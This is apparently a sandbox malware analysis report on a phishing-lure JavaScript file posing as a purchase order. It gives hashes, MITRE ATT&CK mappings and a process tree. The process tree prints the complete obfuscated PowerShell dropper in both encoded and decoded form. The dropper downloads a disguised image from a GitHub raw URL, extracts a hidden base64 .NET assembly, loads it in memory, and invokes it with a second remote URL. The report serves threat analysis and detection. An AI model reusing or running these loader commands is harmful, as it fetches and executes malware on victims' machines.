3696b50af7b213dbb488178e4202096f3efc1e0c9f6f3b8d48e47799d49537f6

General

Target

Purchase Order No. 4500017624.js
Size

133KB
MD5

75620fc98dd7d233cd0aa29c32cf9d44
SHA1

27601368bea910a9e9af5685a2d746397e9fbf75
SHA256

3696b50af7b213dbb488178e4202096f3efc1e0c9f6f3b8d48e47799d49537f6
SHA512

5db62a0f483a14c7f05e58a3725db887e09c6326ff34e927258f73350156f7241ee6ea9222e5aae03ce14bc0934644044e83e74111e9c78d35817a0a5dee8ea7
SSDEEP

3072:3PQ4Hk0LdPdossHOLxD8i5inyBLPqZBC9Tf5PQ4Hk0LdPH:YUdPdljTfiUdPH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg%20

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1780	powershell.exe
6	1780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2488	powershell.exe
1780	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
4	raw.githubusercontent.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2488	powershell.exe
1780	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1668 wrote to memory of 2488	1668	wscript.exe	31
PID 1668 wrote to memory of 2488	1668	wscript.exe	31
PID 1668 wrote to memory of 2488	1668	wscript.exe	31
PID 2488 wrote to memory of 1780	2488	powershell.exe	33
PID 2488 wrote to memory of 1780	2488	powershell.exe	33
PID 2488 wrote to memory of 1780	2488	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Order No. 4500017624.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAbABzAFcAaQBtAGEAZwBlAFUAcgBsACAAPQAgADQAVwBiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAJwArACcAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQwByAHkAcAB0AGUAcgBzAEEAbgBkAFQAbwBvAGwAcwBPAGYAaQBjAGkAYQBsAC8AWgBJAFAALwByAGUAJwArACcAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAcABnACAANABXAGIAOwBsAHMAVwB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwAnACsAJwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbAAnACsAJwBpAGUAbgB0ADsAbABzAFcAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABsAHMAVwB3AGUAYgBDAGwAaQBlAG4AdAAuACcAKwAnAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAbABzAFcAaQBtAGEAZwBlAFUAcgBsACkAOwBsAHMAVwBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABsAHMAVwBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBsAHMAVwBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAA0AFcAYgA8ADwAQgBBAFMARQA2ACcAKwAnADQAXwAnACsAJwBTAFQAQQBSAFQAPgA+ADQAVwBiADsAbABzAFcAZQBuAGQARgBsAGEAZwAnACsAJwAgAD0AIAA0AFcAYgA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4ANABXAGIAOwBsAHMAVwBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAGwAcwBXAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAGwAcwBXAHMAdABhAHIAdABGAGwAYQBnACkAOwBsAHMAVwBlAG4AZABJAG4AZABlAHgAIAA9ACAAbABzAFcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAbABzAFcAZQBuAGQARgBsAGEAZwApADsAbABzAFcAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgACcAKwAnAC0AYQBuAGQAIABsAHMAVwBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAGwAcwBXAHMAdABhAHIAdABJAG4AZABlAHgAOwBsAHMAVwBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAbABzAFcAcwB0AGEAcgB0AEYAbABhAGcAJwArACcALgBMAGUAbgBnAHQAaAA7AGwAcwBXAGIAYQAnACsAJwBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAGwAcwBXAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABsAHMAVwBzAHQAYQByAHQASQBuAGQAZQB4ADsAbABzAFcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABsAHMAVwBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAbABzAFcAcwB0AGEAJwArACcAcgB0AEkAbgBkAGUAeAAsACAAbABzAFcAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AGwAcwBXAGMAbwBtAG0AYQBuAGQAQgB5ACcAKwAnAHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABsAHMAVwBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwBsAHMAVwBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAAnACsAJwA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4AJwArACcALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGwAcwBXAGMAbwBtAG0AYQBuAGQAQgAnACsAJwB5AHQAZQBzACkAOwBsAHMAVwB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwArACcANABXAGIAVgBBAEkANABXAGIAKQA7AGwAcwBXAHYAJwArACcAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABsAHMAVwBuAHUAbABsACwAIABAACgANABXAGIAdAB4AHQAJwArACcALgBhAHQAdAB1AG8ALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ADUAYgAxAGIAYwAwAGQANAA1AGIANgAzADIAZQBiADkAZQBlADYAMgAtAGIAdQBwAC8ALwA6AHMAcAB0AHQAaAA0AFcAYgAsACAANABXAGIAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwA0AFcAJwArACcAYgAsACAANABXAGIAZABlAHMAYQB0AGkAdgBhAGQAbwA0AFcAYgAsACAANABXAGIAZABlAHMAYQB0AGkAdgBhAGQAbwA0AFcAYgAsACAANABXAGIAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMAMwAyADQAVwBiACwAIAA0AFcAYgBkAGUAcwBhAHQAaQB2AGEAZABvADQAVwAnACsAJwBiACwAIAA0AFcAYgBkAGUAcwBhAHQAaQB2AGEAZABvADQAVwBiACkAKQA7ACcAKQAgACAALQBDAFIAZQBQAEwAYQBDAEUAIAAgACcAbABzAFcAJwAsAFsAYwBoAEEAcgBdADMANgAtAEMAUgBlAFAATABhAEMARQAgACAAKABbAGMAaABBAHIAXQA1ADIAKwBbAGMAaABBAHIAXQA4ADcAKwBbAGMAaABBAHIAXQA5ADgAKQAsAFsAYwBoAEEAcgBdADMAOQApAHwAIAAuACAAKAAgACQAcABzAEgAbwBtAEUAWwAyADEAXQArACQAUABzAEgATwBtAGUAWwAzADQAXQArACcAWAAnACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('lsWimageUrl = 4Wbhttps://raw.githubu'+'sercontent.com/CryptersAndToolsOficial/ZIP/re'+'fs/heads/main/DetahNote_J.jpg 4Wb;lsWwebClient = New-Object S'+'ystem.Net.WebCl'+'ient;lsWimageBytes = lsWwebClient.'+'DownloadData(lsWimageUrl);lsWimageText = [System.Text.Encoding]::UTF8.GetString(lsWimageBytes);lsWstartFlag = 4Wb<<BASE6'+'4_'+'START>>4Wb;lsWendFlag'+' = 4Wb<<BASE64_END>>4Wb;lsWstartIndex = lsWimageText.IndexOf(lsWstartFlag);lsWendIndex = lsWimageText.IndexOf(lsWendFlag);lsWstartIndex -ge 0 '+'-and lsWendIndex -gt lsWstartIndex;lsWstartIndex += lsWstartFlag'+'.Length;lsWba'+'se64Length = lsWendIndex - lsWstartIndex;lsWbase64Command = lsWimageText.Substring(lsWsta'+'rtIndex, lsWbase64Length);lsWcommandBy'+'tes = [System.Convert]::FromBase64String(lsWbase64Command);lsWloadedAssembly '+'= [System.Reflection'+'.Assembly]::Load(lsWcommandB'+'ytes);lsWvaiMethod = [dnlib.IO.Home].GetMethod('+'4WbVAI4Wb);lsWv'+'aiMethod.Invoke(lsWnull, @(4Wbtxt'+'.attuo/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth4Wb, 4Wbd'+'esativado4W'+'b, 4Wbdesativado4Wb, 4Wbdesativado4Wb, 4WbAddInProcess324Wb, 4Wbdesativado4W'+'b, 4Wbdesativado4Wb));') -CRePLaCE 'lsW',[chAr]36-CRePLaCE ([chAr]52+[chAr]87+[chAr]98),[chAr]39)| . ( $psHomE[21]+$PsHOme[34]+'X')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OYJ7KRWU0GFSV1LZPNFE.temp

Filesize
7KB

MD5
9f2c6dd61bf2408c5ef1066511654b6f

SHA1
07e2e97426b3ea36a16bcc4c6b14581bf55e87b1

SHA256
c379aba1d3789e32845c4a22ad59f8fb6bed06fd0d335fdb387b2daef00b4e6c

SHA512
976ae897ac8baf99a1690a98cdb94bf09a09b53d9fae83a7006279cbfb67980d10f654f61a517038eedc181e3b2b81ece927f6ffb7906edc685526882b54c0e9

Download Submit
memory/2488-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

Filesize
4KB

Download
memory/2488-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2488-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2488-13-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2488-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2488-14-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing